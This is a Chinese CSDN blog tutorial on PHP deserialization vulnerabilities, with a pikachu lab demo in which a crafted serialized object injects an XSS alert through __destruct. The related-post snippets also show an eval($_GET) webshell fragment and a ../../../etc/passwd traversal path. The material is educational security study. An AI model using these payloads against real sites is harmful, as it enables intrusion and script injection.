WebSec-php Unserialize

最新推荐文章于 2022-03-13 19:56:06 发布
最新推荐文章于 2022-03-13 19:56:06 发布
阅读量2.1k 收藏
点赞数
分类专栏: web 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ga4ra/article/details/122121701
版权

文章目录

About PHP Serialize and Unserialize

序列化:把一个对象变成可传输或存储的形式。反之则是反序列化。

<?php
    class Foobar{
        public      $v1     = "1";
        protected   $v2     = "22";
        private     $v3     = "333";
    }
    $s=new Foobar(); //创建一个对象
    echo "<pre>";
    echo serialize($s); //把这个对象进行序列化
    // 序列化后得到的结果是这个样子的:  
    // O:6:"Foobar":3:{
    //     s:2:"v1";s:1:"1";
    //     s:5:"*v2";s:2:"22";
    //     s:10:"Foobarv3";s:3:"333";
    // }
    //     O:   代表object
    //     6:   代表对象名字长度
    //     Foobar:对象的名称
    //     3:   代表对象里面变量数量
    //     s:   数据类型
    //     2:   变量名称的长度
    //     v1:  变量名称
    //     s:   数据类型
    //     1:   变量值的长度
    //     "1": 变量值

?>

安全方面,相比php,java的反序列化漏洞更多一些。

php反序列化漏洞成因:

  • 输入的反序列化的数据可被用户控制
  • 后台不正当地使用了php魔法函数
<?php
    class S{
        var $test = "pk";
        function __destruct(){
            echo $this->test;
        }
    }
    $s = <<<PAYLOAD
O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
PAYLOAD;
    @$unser = unserialize($s); 

?>

常见的几个魔法函数:

 __construct()	当一个对象创建时被调用
__destruct()	当一个对象销毁时被调用
__toString()	当一个对象被当作一个字符串使用
__sleep() 		在对象在被序列化之前运行
__wakeup()		将在序列化之后立即被调用

靶场练习

pikachu

<?php
    class S{
        var $test = "pk";
        function __destruct(){
            echo $this->test;
        }
    }
    $s = <<<PAYLOAD
O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
PAYLOAD;
    @$unser = unserialize($s); 

?>
CodeStarr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebSec-login:这是一个学校项目
03-11
在这个名为"WebSec-login"的学校项目中,我们将深入探讨如何使用PHP语言构建一个安全、功能完善的登录系统。 一、PHP基础 PHP(Hypertext Preprocessor)是一种广泛使用的开源服务器端脚本语言,尤其适用于Web开发...
websec-readthedocs-io-zh-latest.epub
01-23
websec-readthedocs-io-zh-latest.epub
WebSec-xss
Starr
12-21 260
文章目录1. 关于xss1.1 分类1.2 和csrf区分一下1.3 措施1.3.1 编码1.3.2 过滤html实体CSP1.3.3 校正1.4 绕过2. 靶场练习2.1 pikachu反射型(GET)反射型(POST)存储型XSSDOM xssDOM xss-xxss盲打xss过滤htmlspecialcharsxss href输出xss js输出pkxss-盗取cookiepkxss-钓鱼pkxss-键盘记录 1. 关于xss cwe: https://cwe.mitre.org/data/defin
WebSec-RCE
Starr
12-23 605
文章目录1. RCE1.1 防范1.2 命令连接符2. 靶场练习2.1 pikachupingeval 1. RCE Remote Command/Code Execute. 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如我们常见的路由器、防火墙、入侵检测、自动化运维等设备或系统的web管理界面上。 1.1 防范 实施严格的白名单策略 1.2 命令连接符 & 表示任务在后台执行,如要在后台运行redis-server,则有 redis-server &amp
WebSec-Fileupload
Starr
12-23 913
文章目录1. Fileupload2. 靶场练习2.1 pikachuclientcheckMIME typegetimagesize 1. Fileupload 场景:上传头像、上传附件等 在设计文件上传功能时,一定要对传进来的文件进行严格的安全检查。比如: 验证文件类型、后缀名、大小; 验证文件的上传方式; 对文件进行一定复杂的重命名; 不要暴露文件上传后的路径; 权限控制,上传的文件夹不能有可执行权限。 … 2. 靶场练习 muma.php先准备好: <?php eval($_GET["va
WebSec-SSRF
Starr
12-24 2129
文章目录1. About SSRF2. 靶场练习pikachussrf(curl)ssrf(file_get_content) 1. About SSRF SSRF, Server-Side Request Forgery, 服务器端请求伪造 和CSRF做好区分。 漏洞原因:服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 PHP中下面函数的使用不当会导致SSRF: file_get_cont
WebSec-File Inclusion
Starr
12-23 745
文章目录1. File Inclusion防范2. 靶场练习pikachuFile Inclusion(local)File Inclusion(remote) 1. File Inclusion 主要是这4个函数: include(); include_once(); // include遇到错误会生成警告,脚本继续执行. require(); require_once(); <?php include $_POST["FILE"]; ?> 如果被包含的文件被写成了前端传来的变量,则可能
WebSec-sqli
Starr
12-23 816
文章目录1. 关于sql注入1.1 分类按语句及执行结果划分(首选思路)根据http请求划分根据传入参数类型划分1.2 原理union报错注入updatexmlfloor盲注暴力破解1.3 防范2. 靶场练习pikachu数字型注入(post)字符型注入(get)搜索型注入xx型注入insert/update注入delete注入http header注入布尔盲注时间盲注宽字节注入 1. 关于sql注入 #mermaid-svg-mQEMoK2dKkTJBSf4 .label{font-family:'tre
WebSec-Over Permission
Starr
12-24 2050
文章目录1. 关于越权2. 靶场练习2.1 pikachu水平越权垂直越权 1. 关于越权 两种,水平越权和垂直越权。 一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方。 后台权限管理中应该遵守: 使用最小权限原则对用户进行赋权; 使用合理(严格)的权限校验规则; 使用后台登录态作为条件进行权限判断,别动不动就瞎用前端传进来的条件; 后台检查登录状态不够严谨,可能导致越权。 挖掘方法: 登录后,增删改查操作抓一下包,修改用户名试试; 分析管理员操作的数据包,尝试使用
WebSec-CSRF
Starr
12-21 523
文章目录1. 关于CSRF1.1 防范2. 靶场练习2.1 pikachucsrf(get)csrf(post)csrf(token) 1. 关于CSRF Cross-site request forgery 在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 这也是为什么很多网站上点击外链会有提醒。 判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等
WebSec-Filedownload
Starr
12-23 102
文章目录1. Filedownload2. 靶场练习2.1 pikachuUnsafe Filedownload 1. Filedownload 如果后台在收到下载请求的文件名后, 与路径直接拼接,而不进行安全判断,则可能导致文件下载漏洞。比如../../../etc/passwd 再次强调,所有与前端交互的数据都是不安全的。 2. 靶场练习 2.1 pikachu Unsafe Filedownload 下载一下科比照片: GET /pk/vul/unsafedownload/execdownload.p
websec-check:Firefox 服务的网络安全检查表
05-29
网络安全检查 针对 Firefox 服务网络安全检查表。 Markdown 问题模板: Risk Management --------------- * [ ] The service must have performed a Rapid Risk Assessment ... You need to have access to the ...
websec-weekly:https 背后的数据库、API 和管理器
06-17
有了这个 repo 中的代码,我相信每个人都可以访问构成 Websec Weekly 上所有新闻通讯的内容和数据。 目前,有两个主要管理器负责分发从 API 收集的信息: 生成每周通讯,然后发送到您的电子邮件 HipChat 通知...
detectron2-readthedocs-io-en-latest.zip
02-08
《Detectron2深度学习框架详解》 Detectron2是由Facebook AI Research(FAIR)开发的一个先进的计算机视觉研究平台,基于Python构建,旨在提供强大的工具来支持深度学习在图像识别、物体检测、语义分割等领域的应用...
HTTPS双向认证
Starr
02-28 6999
文章目录双向认证服务端客户端(问题残留) 双向认证 C/S两端分别生成密钥对,交换公钥,基于公钥验证另一端。 第一步,创建密钥对,把公钥存储为自签名、PEM编码的证书。用openssl即可,这里以一个HTTPS服务端为例: openssl req -nodes -x509 -newkey rsa:4096 -keyout serverKey.pem -out serverCrt.pem -days 365 serverKey.pem包含服务器的私钥,需要保护;serverCrt.pem包含服务器的公钥,用
sqlmap功能梳理
Starr
03-13 2313
文章目录1. Target连接数据库加载文件2. Requestcookiehost、UA等其它http头部认证代理延迟、超时与重置随机参数安全模式忽略其它3. Optimization4. Injection指定DBMS指定系统sqlmap机制开关无效值替换指定payload前后缀设置tamper绕过waf脚本5. Detection探测levelrisk页面比较6. sqli techniqueDNS攻击!!!二次注入7. 指纹8. Enumeration检索信息经典套路其它(部分):9. Brute
DVWA 文件包含及上传漏洞
Starr
03-07 2101
文章目录1. DVWA File InclusionLow levelMedium levelHigh levelImpossible level2. DVWA File uploadLow levelMedium levelHigh levelImpossible Level 1. DVWA File Inclusion Low level url路径: /dvwa/vulnerabilities/fi/index.php?page=include.php 可以看出page参数对应的php会被包含,尝试
DVWA-CSRF
Starr
03-08 1700
文章目录CSRFLow levelMedium levelHigh levelImpossible level CSRF 之前的笔记:https://blog.csdn.net/Ga4ra/article/details/122060519 Low level 题目是一个修改密码的页面,修改密码点击提交,url如下: /dvwa/vulnerabilities/csrf/?password_new=aaa&password_conf=aaa&Change=Change# 这个页面任意访问,
sqli-labs-challenges
Starr
02-21 1239
文章目录一. Union54. GET-10 queries55. GET-14 queries56.57.二. Double Query58. GET-5 queries59.60.61.!!!!三. Blind62. GET-130 queries sqli labs靶场 page 4是挑战性的,每个题都提交一定的请求次数后,就会重置数据库,所以没法用盲注。 获取到数据库里的secret key并提交,则通关。 在刷page4 challenge的时候,重点练习了一下闭合符号的判断,之前几个page的判
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值